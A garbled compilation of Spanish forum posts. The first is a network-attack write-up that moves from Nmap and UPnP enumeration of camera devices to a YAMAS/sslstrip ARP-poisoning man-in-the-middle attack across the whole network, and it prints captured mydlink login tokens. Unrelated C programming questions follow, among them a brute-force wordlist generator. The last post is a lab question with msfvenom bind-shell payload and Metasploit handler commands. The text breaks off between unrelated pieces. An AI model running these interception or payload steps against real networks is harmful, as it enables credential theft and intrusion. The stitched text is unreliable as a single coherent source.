| ssl-cert: Subject: organizationName=Internet Widgits Pty Ltd/stateOrProvinceName=HsinChu/countryName=TW
| Not valid before: 2004-07-12 09:02:20
|_Not valid after:  2024-07-12 09:02:20
| http-methods: Potentially risky methods: PUT
|_See http://nmap.org/nsedoc/scripts/http-methods.html
MAC Address: 00:1B:11:01:30:95 (D-Link)
OS details: WAP (Cisco Aironet 1010, D-Link DWL-2100AP or DWL-3200AP, Linksys WAP51AB or WAP55AG, Netgear WPN824, or Proxim ORiNOCO AP-4000M), Lights-Out remote server management, or ReplayTV 5500 DVR, Enterasys Matrix C1 switch or HP LaserJet 3600 printer
Network Distance: 1 hop
Service Info: Device: router

TRACEROUTE
HOP RTT     ADDRESS
1   7.18 ms 192.168.1.10

Los resultados que obtenemos para esta IP son bastante interesantes, ya que según Nmap parace que nos encontramos frente a otro router. Esto rompería los esquemas que nos habíamos hecho en un principio sobre la composición de la red.

ETHERAPE

Para entender mejor como funciona la red y que hosts se comunican entre sí ejecutamos el Etherape.
Etherape es un programa que básicamente sirve para mapear el recorrido que siguen las comunicaciones en la red para así poder hacernos una idea de la estructura de la misma.

Esto es lo que obtenemos tras un rato ejecutando etherape:



Como se puede ver parece que la IP 239.255.255.250 se comunica constantemente con las IPs de las camaras de seguridad. Esto llama la atención, primero porque en nuestro primer escaneo con Nmap no habíamos detectado ese host, lo que hace pensar que se trata de un host externo a la red (más adelante veremos que esto no es así). Ejecutamos Nmap para intentar escanearlo.

root@bt:~# nmap 239.255.255.250

Starting Nmap 5.61TEST4
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 0.44 seconds

Efectivamente nos da como resultado host down.
Probamos con algo diferente, vamos a realizar un ping a la IP mientras corremos el Etherape para mapear el recorrido de los paquetes.

Esto es lo que obtenemos con Etherape+Ping:






IP 239.255.255.250 MULTIDIFUSIÓN UPnP

Como podemos ver, nosotros estamos mandando paquetes solamente a la IP 239.255.255.250 pero recibimos paquetes de respuesta de las IPs 192.168.1.1 192.168.1.13 192.168.1.14 192.168.1.15 . Esto significa que la IP 239.255.255.250 reenvía nuestros "paquetes de ping" a esas IPs, como puede verse en el mapeado de Etherape. Otro dato interesante es que en algunos paquetes aparece "DUP!", esto quiere decir que el paquete está duplicado, lo que nos indica que nos llegan varias respuestas iguales desde diferentes direcciones, osea, que el paquete que les llega a todos los hosts es el mismo paquete que nosotros envíamos a 239.255.255.250, por eso nos llegan respuestas repetidas.

Si investigamos un poco en internet http://sanmaikelnews.comze.com/?p=66, descubrimos que la ip 239.255.255.250 es una dirección de multidifusión utilizada por el protocolo UPnP. Los dispositivos que ofrecen servicios UPnP envian periódicamente NOTIFICACIONES SSDP al 239.255.255.250:1900, anunciandose a los clientes que están escuchando. Una NOTIFICACION SSDP contiene una cabecera de ‘Localización’ donde especifica la ubicación de un archivo XML. Este archivo XML contiene datos que indican, entre otras cosas, el tipo (s) de dispositivo UPnP y los servicios soportados por el host, así como rutas adicionales a otros documentos XML que describen los diversos servicios en detalle. Del mismo modo, los clientes UPnP pueden enviar requerimientos SSDP M-SEARCH al 239.255.255.250:1900 para ver si alguno de los dispositivos UPnP responde.

MIRANDA

Auditar dispositivos UPnP de manera manual es un proceso que requiere mucho tiempo y dedicación. Miranda es un script escrito en python que nos permite automatizar y acelerar considerablemente todo este proceso.

Su localización en la suite de backtrack es:

/pentest/enumeration/miranda

Corremos el script miranda.py

Lo primero que necesitamos es encontrar los hosts UPnP que existen en nuestra red:

upnp> msearch

Entering discovery mode for 'upnp:rootdevice', Ctl+C to stop...

****************************************************************
SSDP reply message from 192.168.1.17:8838
XML file is located at http://192.168.1.17:8838/rootdesc.xml
Device is running Cellvision UPnP/1.0
****************************************************************

****************************************************************
SSDP reply message from 192.168.1.16:8156
XML file is located at http://192.168.1.16:8156/rootdesc.xml
Device is running Cellvision UPnP/1.0
****************************************************************

****************************************************************
SSDP reply message from 192.168.1.20:8838
XML file is located at http://192.168.1.20:8838/rootdesc.xml
Device is running Cellvision UPnP/1.0
****************************************************************

****************************************************************
SSDP reply message from 192.168.1.19:8838
XML file is located at http://192.168.1.19:8838/rootdesc.xml
Device is running Cellvision UPnP/1.0
****************************************************************

****************************************************************
SSDP reply message from 192.168.1.1:2800
XML file is located at http://192.168.1.1:2800/WFADevice.xml
Device is running Unknown/0.0 UPnP/1.0 Conexant-EmWeb/R6_1_0
****************************************************************

****************************************************************
SSDP reply message from 192.168.1.15:11993
XML file is located at http://192.168.1.15:11993/description.xml
Device is running Embedded UPnP/1.0
****************************************************************

****************************************************************
SSDP reply message from 192.168.1.18:8838
XML file is located at http://192.168.1.18:8838/rootdesc.xml
Device is running Cellvision UPnP/1.0
****************************************************************

****************************************************************
SSDP notification message from 192.168.1.13:10242
XML file is located at http://192.168.1.13:10242/description.xml
Device is running Embedded UPnP/1.0
****************************************************************

****************************************************************
SSDP reply message from 192.168.1.14:10242
XML file is located at http://192.168.1.14:10242/description.xml
Device is running Embedded UPnP/1.0
****************************************************************

Después listamos los hosts descubiertos:

upnp> host list

   

• 192.168.1.17:8838
[1] 192.168.1.16:8156
   [2] 192.168.1.20:8838
   [3] 192.168.1.19:8838
   [4] 192.168.1.1:2800
   [5] 192.168.1.15:11993
   [6] 192.168.1.18:8838
   [7] 192.168.1.13:10242
   [8] 192.168.1.14:10242

Nos damos cuenta de que son todas las cámaras + el router
-------------- CAPITULO EN CONSTRUCCIÓN --------------------

MITM

Para ejecutar el ataque MITM vamos a utilizar YAMAS, un script que permite automatizar considerablemente el proceso del ataque.

Para el primer ataque vamos a seleccionar como objetivo toda la red y vamos a redirigir el trafíco de los puertos 80 a ver que encontramos.


root@bt:~# yamas
No update available
Script is installed


                                                               
     `YMM'   `MM'   db      `7MMM.     ,MMF'      db       .M"""bgd
       VMA   ,V    ;MM:       MMMb    dPMM       ;MM:     ,MI    "Y
        VMA ,V    ,V^MM.      M YM   ,M MM      ,V^MM.    `MMb.     
         VMMP    ,M  `MM      M  Mb  M' MM     ,M  `MM      `YMMNq.
          MM     AbmmmqMA     M  YM.P'  MM     AbmmmqMA   .     `MM
          MM    A'     VML    M  `YM'   MM    A'     VML  Mb     dM
        .JMML..AMA.   .AMMA..JML. `'  .JMML..AMA.   .AMMA.P"Ybmmd"
===========================================================================
=       Welcome to Yet Another MITM Automation Script.                    =
=       Use this tool responsibly, and enjoy!                             =
=       Feel free to contribute and distribute this script as you please. =
=       Official thread :

http://tinyurl.com/yamas-bt5                    =
=       Check out the help (-h) to see new features and informations      =
=       You are running version 20120213                            =
===========================================================================
Message of the day :
  Reviewing some code...
Could someone send me a complete log file? I'm planning on making a better parsing.
On another note, I today had the privilege to witness that Yamas works against Youporn mobile. MMD.

Please make sure to check out my last project : http://msimdb.comax.fr

 

• Cleaning iptables
[-] Cleaned.

 
• Activating IP forwarding...
[-] Activated.

 
• Configuring iptables...

To what port should the traffic be redirected to? (default = 8080)

Port 8080 selected as default.

 From what port should the traffic be redirected to? (default = 80)

Port 80 selected as default.


 Traffic from port 80 will be redirected to port 8080
[-] Traffic rerouted

 

• Activating sslstrip...

Choose filename to output : (default = yamas)
wlan_ed
 Sslstrip will be listening on port 8080 and outputting log in /tmp/wlan_ed.txt

sslstrip 0.9 by Moxie Marlinspike running...

 [-] Sslstrip is running.


 

• Activating ARP cache poisoning...

Gateway : 192.168.1.1      Interface : wlan0

Enter IP gateway adress or press enter to use 192.168.1.1.

192.168.1.1 selected as default.


What interface would you like to use? It should match IP gateway as shown above. Press enter to use wlan0.

wlan0 selected as default.


We will target the whole network as default. You can discover hosts and enter IP(s) manually by entering D.
Press enter to default.


 Targeting the whole network on 192.168.1.1 on wlan0 with ARPspoof
[-] Arp cache poisoning is launched.  Keep new window(s) running.

 Attack should be running smooth, enjoy.

Aquí está el resultado de este primer ataque:

Website =    prov.eu.mydlink.com):
Login =    tfQmw7Lw5EAzo1LgDdUkp1vyZCx6XRXyMvi6TA6o7PW5UPCp4Yf5D54cSTQ6xdbpgYT6FsJoqYQdRsXps3Aw88Mm18tsUsMy20T37OboNmy5VdvoavTsWjZ7ro3kF17inCMlV5WggzDjGstwB8gyrw3wRd7mzyY3HTU$
Website =    prov.eu.mydlink.com):
Login =    Pw2eMpFln89k4cF6Tcpo6m/6ItsmWvNsMpdlSdj5xyGoQyB6yvhoXjzeFzpvs5+6d6HvrAFibT2tHB0$
Website =    prov.eu.mydlink.com):
Login =    4cr6n8hci/evlGheWlo7kGHsQKBmA+ssKu1mUJ938VzjTVa83XNjWfPwCZrmvlR8yXlmEkp3zXrtVks8ebec7gn62gVyTkns1Hlo8FR3GqFjRlH3q7NySr2keaw7VVqnn9s4EGlnsIoyCJe8ZSOtWW+zvI2tcSezZZq$
Website =    prov.eu.mydlink.com):
Login =    QkjpNasdssmsvjsxWj/rbvpxQoFqTmakXyVdY32f3pwrIpqxim0rMcanYolwZsqmTjewmw9odpr3cBayEQz$
Website =    prov.eu.mydlink.com):
Login =    +en3Kneyp7ht6feaRUwi5f/wHnOoG4mwO9Ro0kF6nbpp9bl5hePpRGNsFrnorU15aeaoSJz6benvDJm5cVhyjFr3YF2c9JrwJxamng16AW9pWU/6tHRlQK+tzSddNbevsfmdQencc4jkEq2iebjlVqqra+wkFqhebbk$
Website =    prov.eu.mydlink.com):

  Hola a todos !

Alguien podria ojear este codigo y decirme donde esta la violacion de segmento??


/*DICCIONARIO*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int desde;
int hasta;

char nombre[25];   He suprimido esta variable que estaba duplicada, pero sigue el problema..

void calcula (void);


int main()
{
    int ndopcion;
   
    printf("\n\n\t\t\t\tMENU\n\n");
    printf("\n\t\t1\tNumeroS\n\t\t2\tMayusculaS\n\t\t3\tMinusculaS\n\t\t4\tVaciO\n\t\t5\tVaciO\n");
    printf ("\nIntroduza numero de opcion: ");
    scanf (" %d" ,&ndopcion);
   
        switch (ndopcion)
        {
            case 1:
                    {
                    desde=48;
                    hasta=57;
                        calcula();
                    }
            break;
           
            case 2:
                    {
                        desde=65;
                        hasta=90;
                        calcula();
                       
                        }
            break;
           
            case 3:
                    {
                        desde=97;
                        hasta=122;
                        calcula();
                       
                        }
            break;
           
            case 4:
                    {
                   
                }
            break;
           
            case 5:
            {
                   
                }
            break;
            }
       
        }
   
    void calcula (void)
    {
   
    int a, b, c, d, e, f, g, h;
char clv[8];
char nombre[20];
    printf("\nIntroduzca nombre del archivo de salida: ");
    gets(nombre);

 
    FILE *hoja1;
    hoja1 = fopen (nombre , "wt");
    if (hoja1 == NULL)
    printf ("No se ha podido crear el fichero");
    else
       
    for (a=desde; a<= hasta; a++)
    {
        clv[0] = a;
        for (b=desde; b <= hasta; b++)
        {
            clv[1] = b;
                for (c=desde; c<= hasta; c++)
            {   
                clv[2] = c;
                for (d=desde; d<= 90; d++)
                {   
                    clv[3] = d;
                        for (e=desde; e<=hasta; e++)
                        {   
                            clv[4] = e;
                            for (f=desde; f<= hasta; f++)
                            {   
                                clv[5] = f;
                                for (g=desde; g<=hasta; g++)
                                {
                                  clv[6] = g;
                                   for(h=desde; h <= hasta; h++)
                                   {
                                       clv[7] = h;
                                     
                                       
                                    fwrite (clv, sizeof(clv), 1, hoja1);
                                   
                       
                               
                             }
                           
                         }
                     }
                  }
               }
            }
        }
    }
    fclose(hoja1);
    printf("\n%s", clv);
    printf("\nArchivo cerrado\n\n ");
}

 Estas funciones como su propio nombre indica, obtienen el UID del usuario, en sistemas Gnu con linux. Más tarde explicare para que se suele usar.

  Echando mano del `man' vemos las estructura de la función:

Código: [Seleccionar]
#include <unistd.h>
#include <sys/types.h>

uid_t getuid(void);
uid_t geteuid(void);

  Tenemos que incluir dichas cabeceras, y como vemos la función retorna un tipo de dato desconocido (por ahora :p), y no hace falta pasarle parámetros. A menudo se suelen poner nombres que nos son desconocidos, para identificar el tipo de dato de una función concreta, por ejemplo el tipo de dato "uid_t" no es más que un entero, pero al tener ese nombre ya nos confunde :p. De ahí que hayamos puesto la cabecera "types.h".

  Ok, ¿ para que podríamos usar esto ?, primero hay que saber que es el uid (si has trabajado alguna vez en sistemas linux lo deberías saber :p). Es el identificador de usuario, un número entero que nos identifica (ejecutar `id -u <USER>' para saber tu id). Donde esta la gracia de esto, pues que el usuario root (superusuario) siempre tendrá como UID el valor 0. Con lo cual si para ejecutar unas tareas en nuestro código necesitamos que el usuario que lo haya lanzado tenga los permisos de root, podemos saber perfectamente si los tiene o no, y en caso contrario mandarle un mensaje indicándoselo.

Código: [Seleccionar]
uid_t uid;         // Declaramos el tipo de dato que contendrá el UID (es un int).
uid = getuid();    // La función retorna el ID del usuario que llamó al proceso.
if(uid != 0){      // Si no es 0 no es root.
  fprintf(stderr,"ERROR: Debes lanzar el programa como \"root\".\n");
  exit(1);
}

  La función geteuid() es parecida a la anterior solo que muestra el id del usuario "efectivo". Con la función anterior tenemos de sobra, esta se usa más para detectar escaladas de privilegios (creo recordar).

  Saludos Att: Nightcode

hola foro

les agradezco me ayuden a resolver este error
lo que pienso es que no estoy realizando bien el uso de funciones

 
Código: [Seleccionar]
funcionTest.c:27:6: error: tipos en conflicto para ‘intercambio’
funcionTest.c:2:6: nota: la declaración previa de ‘intercambio’ estaba aquí
funcionTest.c:36:6: error: tipos en conflicto para ‘imprimir’
funcionTest.c:3:6: nota: la declaración previa de ‘imprimir’ estaba aquí


este es el codigo del programa
Código: [Seleccionar]
#include<stdio.h>
void intercambio(int mitad, int vectorUno, int vectorDos);
void imprimir(int mitad, int vectorUno, int vectorDos);

int main(){
int i,num,mitad;
printf("ingrese el tamaño del vector : ");
scanf("%d",&num);

mitad=num/2;
int vectorNumeros[num];
int vectorUno[mitad];
int vectorDos[mitad];

for(i=0; i<num; i++){
    vectorNumeros=i+1;
}
for(i=0; i<mitad; i++){
    vectorUno=vectorNumeros;
    vectorDos=vectorNumeros[i+mitad] ;
}
intercambio(mitad,  vectorUno[mitad], vectorDos[mitad]);
imprimir( mitad,  vectorUno[mitad],  vectorDos[mitad]);
printf("\n");
}
void intercambio(int mitad, int vectorUno[mitad], int vectorDos[mitad]){
int i,auxUno,auxDos;
     for(i=0; i<mitad; i++){
        auxUno=vectorUno;
        auxDos=vectorDos;
        vectorUno=auxUno;
        vectorDos=auxDos;
     }
}
void imprimir(int mitad, int vectorUno[mitad], int vectorDos[mitad]){
int i;
    for(i=0; i<mitad; i++){
       printf("[%d",vectorUno);
       printf("] vs [");
       printf("%d]",vectorDos);
       printf("\n");
    }
}

Buenas, esta vez estoy haciendo un ejercicio en C que saque las raices de una ecuación de segundo grado mediante el método de rufini. Aquí les dejo el codigo:

#include <stdio.h>
#include <stdlib.h>
#include <math.h>

int main ()
{
    int a, b, c;
    int i, j, r1, r2;
   
    printf("Ingrese los coeficientes de la ecuacion para mostrar sus raices");
    printf("\nIngrese el primer coeficiente: ");
    scanf("%d", &a);
    printf("\nIngrese el segundo coeficiente: ");
    scanf("%d", &b);
    printf("\nIngrese el tercer coeficiente: ");
    scanf("%d", &c);
   
    /*
     * El primer for que va ascenso
     * */
   
    for(i= 1 ; i==1 ; i++){
       /* Primera operacion
        * de la regla de rufini
        * */
            r1= i*a + b;
            b= r1;
            r1= b*i + c;
           
            if(r1 == 0){
            c= 0;
             r1= i;
                printf("\nLa primera raiz es: %d", r1);
                }
         /*
          * Segunda operación
          * de la regla de rufini.
          * */       
            r2= i * a;
            r2= r2 + b;
           
            if(r2 == 0){
            b= 0;
            r2= i;
            printf("\nLa segunda raiz es: %d", r2);
            }
         
      }

/*
 * El segundo for que va en descenso
 * */

     for(j= -1 ; j== -1 ; j--){
       /* Primera operacion
        * de la regla de rufini
        * */
            r1= j*a + b;
            b= r1;
            r1= b*j + c;
           
            if(r1 == 0){
            c= 0;
            r1= j;
                printf("\nLa primera raiz es: %d", r1);
                }
         /*
          * Segunda operación
          * de la regla de rufini.
          * */       
            r2= j*a;
            r2= r2 + b;
           
            if(r2 == 0){
            b= 0;
            r2= j;
            printf("\nLa segunda raiz es: %d", r2);
            }
            
      }
           
   
    return 0;
}

He estado casi obsesionado con hacerlo de esta manera y lo e modificado bastante. Lo que quiero hacer con los dos for es que vayan buscando números positivos y negativos hasta que consigan uno con el cual se cumplan las condiciones del if. El primer for va a buscar números positivos en orden ascendente, es decir que irá sumando de uno en uno e valor de la "i", a su vez cada valor de la "i" se irá multiplicando o sumando con los coeficientes que el usuario haya ingresado hasta que llegue al if, y si el resultado de la ultima suma es cero entonces quiere decir que el ultimo valor que tomó i es la primera raíz de la ecuación.

Si el primer for no encontró las raíces en numero positivos, entonces que pase al siguiente for y busque en los numero s negativos, es decir que en este for la j va en descenso. Este for solo buscará número negativos, es decir desde el -1 hacia la izquierda.

Bueno lo que sucede es que cuando compilo el programa e introduzco los coeficientes 1, 2 y 1 que corresponde a la ecuación: Ax^2 + Bx + C= 0 (A= 1, B= 2 y C= 1), entonces no me da ninguna raíz, como si los bucles no estuvieran trabajando. Cuando en realidad las raíces de esta ecuación son -1 y -1 sacandolas por el método de ruffini.

Ola amigos del foro tengo unas dudas q espero puedan ayudarme, estoy tratando de hacer pruebas de penetracion con metasploit y meterpreter pero obviamente algo estoy haciendo mal o algun concepto no lo manejo del todo. bueno comienzo, realizo las pruebas en vmware maquina 1 Kali y maquina 2 win xp sp3 (sin nada instalado). la configuracion de kali es eth0 conexión NAT (para tener acceso a intertet) y eth1 conexión host-only. Para win xp tengo conexión host-only, bueno al realizar Nmap genera lo siguiente:




Starting Nmap 6.40 ( http://nmap.org ) at 2013-10-28 05:03 CLST
NSE: Loaded 23 scripts for scanning.
Initiating ARP Ping Scan at 05:03
Scanning 192.168.XX.XXX [1 port]
Completed ARP Ping Scan at 05:03, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 05:03
Completed Parallel DNS resolution of 1 host. at 05:03, 13.01s elapsed
Initiating SYN Stealth Scan at 05:03
Scanning 192.168.XX.XXX [1000 ports]
Discovered open port 139/tcp on 192.168.XX.XXX
Discovered open port 3389/tcp on 192.168.XX.XXX
Discovered open port 135/tcp on 192.168.XX.XXX
Completed SYN Stealth Scan at 05:03, 1.22s elapsed (1000 total ports)
Initiating Service scan at 05:03
Scanning 3 services on 192.168.XX.XXX
Completed Service scan at 05:03, 6.08s elapsed (3 services on 1 host)
NSE: Script scanning 192.168.XX.XXX
NSE: Starting runlevel 1 (of 1) scan.
Nmap scan report for 192.168.XX.XXX
Host is up (0.00024s latency).
Scanned at 2013-10-28 05:03:20 CLST for 20s
Not shown: 997 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn
3389/tcp open  ms-wbt-server Microsoft Terminal Service
MAC Address: 00:0C:29:XX:XX:XX (VMware)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.56 seconds
           Raw packets sent: 1068 (46.976KB) | Rcvd: 1001 (40.040KB)



en Nesus:



high
MS12-020: Vulnerabilities in Remote Desktop Could Allow Remo...
Windows
1
medium
Microsoft Windows Remote Desktop Protocol Server Man-in-the-...
Windows
1
medium
Terminal Services Encryption Level is Medium or Low
Misc.
1
low
Terminal Services Encryption Level is not FIPS-140 Compliant...
Misc.
1



Ahora intente realizar un meterpreter según un tutorial realizado por Sanko, realice msfvenom con el payload shell_bind_tcp,
quedando algo asi:

msfvenom --payload windows/shell_bind_tcp LPORT=1337 C --encoder x86/shikata_ga_nai --iterations 6 --bad-chars '\x00'

con este shellcode genere un .exe y lo ejecute en la maquina de win xp, lo cual queda como en la imagen:






Si se fijan queda 0.0.0.0 1337, bueno el problema que cuando quiero llamar con handlen no conecta:



use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.XX.XXX
set LPORT 1337
exploit


Bueno aca van las preguntas:

1.- Con los puertos abiertos que da Nmap y las vulnerabilidades de Nessus que payload puedo ocupar para generar una conexion meterpreter??

2.- Con el shell_bind_tcp LPORT=1337, LPORT es mi puerto abierto, osea el de la maquina virtual de Kali como puedo verificar q ese puerto esta abierto, lo tengo q abrir o como puedo abrir un puerto en una maquina virtual???

3.- En las maquinas virtuales tengo q tener abierto los puertos (ya sea RPORT y LPORT) para hacer pruebas de penetración??

4.- Como puedo hacer conexión meterpreter con la información entregada???


Bueno espero puedan ayudarme y gracias de ante mano... Saludos!!!